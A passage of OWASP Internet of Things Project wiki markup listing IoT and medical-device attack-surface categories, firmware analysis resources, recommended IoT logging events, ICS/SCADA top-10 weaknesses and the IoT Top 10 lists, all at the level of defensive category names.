* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246178OWASP Internet of Things Project2018-12-19T23:26:50Z<p>Aaron.guzman: /* Collaboration */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
==OWASP Internet of Things (IoT) Project==<br />
<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The OWASP IoT Project is currently reviewing the Top Ten list for 2018. The official launch date is December 2018. Provide your insight and expertise by joining the #iot-security channel meetups on Slack.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
